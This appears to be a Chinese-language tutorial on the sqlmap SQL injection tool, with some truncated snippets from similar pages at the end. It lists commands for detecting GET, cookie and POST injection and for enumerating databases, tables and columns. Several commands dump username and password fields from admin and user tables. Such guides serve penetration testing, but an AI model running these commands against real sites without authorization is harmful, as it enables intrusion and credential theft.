sqlmap的注入使用
sqlmap是一款強大的注入工具,相比經典的啊d和明小子之類的注入工具,sqlmap功能更加強大,無論是自帶字典,功能還是介面優化,都是一款非常不錯的注入工具,sqlmap可以多平台 執行,windows,linux下都可以進行access,mysql,mssql等資料庫的注入 ,更重要的是sqlmap是一款開源的工具
找到sqlmap路徑,在cmd裡面輸入cd cc路徑進入到sqlmap路徑目錄下,然後輸入python sqlmap.py -u"*********"
sqlmap語句含義:
三種注入判斷方式:
python sqlmap.py -u 「******.com」 [查詢鏈結是否存在get注入漏洞以及返現目標基本資訊]
python sqlmap.py -u 「******.com」 --cookie 「id=xx」 --level 2 [判斷url是否存在cookie注入]
python sqlmap.py -u 「******.com」 --data 「xx=xx&xx=xx」 [判斷url是否存在post注入]
python sqlmap.py -u 「******.com」 --dbs [獲取資料庫內所有資料庫名稱]
python sqlmap.py -u 「******.com」 --current-db [檢視目標**所存在的資料庫名稱]
python sqlmap.py -u 「******.com」 -d xx --tables [獲取xx資料庫內的表資訊]
python sqlmap.py -u 「******.com」 d xx [資料庫名] -t xx [表名] --columns [獲取表內列的資訊]
python sqlmap.py -u 「******.com」 d xx -t xx -c xx,xx[列名] --dump [獲取列內資訊]
sqlmap.py -u --cookie 「id=27」 --level 2 //判斷是否村內在cookie注入
sqlmap.py -u --cookie 「id=27」 --level 2 --tables//猜解admin表下的列名
sqlmap.py -u --cookie 「id=27」 --level 2 --dump -c 「usename,password」 -t admin//獲取指定列名admin下的資料
sqlmap.py -u 「u=admin&p=123456」 //判斷注入
sqlmap.py -u 「u=admin&p=123456」 --tables//猜解表明
sqlmap.py -u 「u=admin&p=123456」 --tables -d 「security」//猜解security資料庫下的表名
sqlmap.py -u 「u=admin&p=123456」 --columns -t 「user」 //猜解security資料庫下的表名user中的列名
sqlmap.py -u 「u=admin&p=123456」 --dump -c 「isername,password」 -t user //猜解資料
sqlmap常用命令
1.找到注入點url 2.sqlmap u url v 1 dbs 列出資料庫 或者 sqlmap u url v 1 current db 顯示當前資料庫 3.sqlmap u url v 1 users 列出資料庫使用者 current user當前資料庫使用者 4.sqlmap u url v...
SqlMap常用命令
sqlmap是我們常用的一款sql注入漏洞檢測工具,為了方便大家平時的使用,在此分享一下我總結的一下命令。目錄結構 extra 額外功能 lib 連線庫,注入引數,提權操作 tamper 繞過指令碼 thirdparty 第三方外掛程式 txt 字典,例如瀏覽器 表,列,關鍵字 udf 自定義攻擊載...
sqlmap常用命令
sqlmap.py u current db 獲取當前資料庫名稱 sqlmap.py u tables d db name 列出指定資料庫的所有表名 列出指定資料庫 指定表的欄位名 列出指定資料庫 指定表 指定欄位的內容,c column name 可以省略,省略的話會列出當前表的所有字段內容 攜帶...